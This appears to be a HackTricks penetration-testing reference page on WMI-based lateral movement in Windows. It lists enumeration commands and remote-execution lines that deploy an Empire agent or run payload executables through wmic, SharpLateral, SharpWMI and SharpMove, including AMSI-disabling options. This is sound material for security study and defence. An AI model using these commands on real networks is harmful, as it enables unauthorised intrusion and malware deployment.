wmiexec.md (6237B)
1 --- 2 title: "WmiExec" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/lateral-movement/wmiexec.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/lateral-movement/wmiexec.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # WmiExec 14 15 ## How It Works Explained 16 17 Processes can be opened on hosts where the username and either password or hash are known through the use of WMI. Commands are executed using WMI by Wmiexec, providing a semi-interactive shell experience. 18 19 **dcomexec.py:** Using different DCOM endpoints, this script offers a semi-interactive shell similar to `wmiexec.py`. The selected `-object` value chooses the endpoint; supported objects include `MMC20.Application`, `ShellWindows`, and `ShellBrowserWindow`, with the latter providing the Shell Browser Window technique highlighted in the original walkthrough.<sup>[[2]](#references)[[3]](#references)</sup> 20 21 ## WMI Fundamentals 22 23 ### Namespace 24 25 Structured in a directory-style hierarchy, WMI's top-level container is \root, under which additional directories, referred to as namespaces, are organized.<sup>[[1]](#references)</sup> 26 Commands to list namespaces: 27 28 ```bash 29 # Retrieval of Root namespaces 30 gwmi -namespace "root" -Class "__Namespace" | Select Name 31 32 # Enumeration of all namespaces (administrator privileges may be required) 33 Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace 34 35 # Listing of namespaces within "root\cimv2" 36 Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace 37 ``` 38 39 Classes within a namespace can be listed using: 40 41 ```bash 42 gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified 43 gwmi -Namespace "root/microsoft" -List -Recurse 44 ``` 45 46 ### **Classes** 47 48 Knowing a WMI class name, such as win32_process, and the namespace it resides in is crucial for any WMI operation. 49 Commands to list classes beginning with `win32`: 50 51 ```bash 52 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2" 53 gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*" 54 ``` 55 56 Invocation of a class: 57 58 ```bash 59 # Defaults to "root/cimv2" when namespace isn't specified 60 Get-WmiObject -Class win32_share 61 Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus 62 ``` 63 64 ### Methods 65 66 Methods, which are one or more executable functions of WMI classes, can be executed. 67 68 ```bash 69 # Class loading, method listing, and execution 70 $c = [wmiclass]"win32_share" 71 $c.methods 72 # To create a share: $c.Create("c:\share\path","name",0,$null,"My Description") 73 ``` 74 75 ```bash 76 # Method listing and invocation 77 Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0) 78 ``` 79 80 ## WMI Enumeration 81 82 ### WMI Service Status 83 84 Commands to verify if the WMI service is operational: 85 86 ```bash 87 # WMI service status check 88 Get-Service Winmgmt 89 90 # Via CMD 91 net start | findstr "Instrumentation" 92 ``` 93 94 ### System and Process Information 95 96 Gathering system and process information through WMI: 97 98 ```bash 99 Get-WmiObject -ClassName win32_operatingsystem | select * | more 100 Get-WmiObject win32_process | Select Name, Processid 101 ``` 102 103 For attackers, WMI is a potent tool for enumerating sensitive data about systems or domains.<sup>[[1]](#references)</sup> 104 105 ```bash 106 wmic computerystem list full /format:list 107 wmic process list /format:list 108 wmic ntdomain list /format:list 109 wmic useraccount list /format:list 110 wmic group list /format:list 111 wmic sysaccount list /format:list 112 ``` 113 114 Remote querying of WMI for specific information, such as local admins or logged-on users, is feasible with careful command construction. 115 116 ### **Manual Remote WMI Querying** 117 118 Stealthy identification of local admins on a remote machine and logged-on users can be achieved through specific WMI queries. `wmic` also supports reading from a text file to execute commands on multiple nodes simultaneously.<sup>[[1]](#references)</sup> 119 120 To remotely execute a process over WMI, such as deploying an Empire agent, the following command structure is employed, with successful execution indicated by a return value of "0":<sup>[[1]](#references)</sup> 121 122 ```bash 123 wmic /node:hostname /user:user path win32_process call create "empire launcher string here" 124 ``` 125 126 This process illustrates WMI's capability for remote execution and system enumeration, highlighting its utility for both system administration and penetration testing. 127 128 ## Automatic Tools 129 130 - [**SharpLateral**](https://github.com/mertdas/SharpLateral): 131 132 ```bash 133 SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe 134 ``` 135 136 - [**SharpWMI**](https://github.com/GhostPack/SharpWMI) 137 138 ```bash 139 SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true] 140 # Stealthier execution with VBS 141 SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs] 142 ``` 143 144 - [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove): 145 146 ```bash 147 SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password 148 SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password 149 SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password 150 ``` 151 152 - You could also use **Impacket's `wmiexec`**. 153 154 155 ## References 156 157 - [1] [Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM)](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) 158 - [2] [Fortra Impacket – dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) 159 - [3] [Beginner's Guide to Impacket Tool Kit, Part 1 – Hacking Articles (Internet Archive)](https://web.archive.org/web/20190822180831/https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)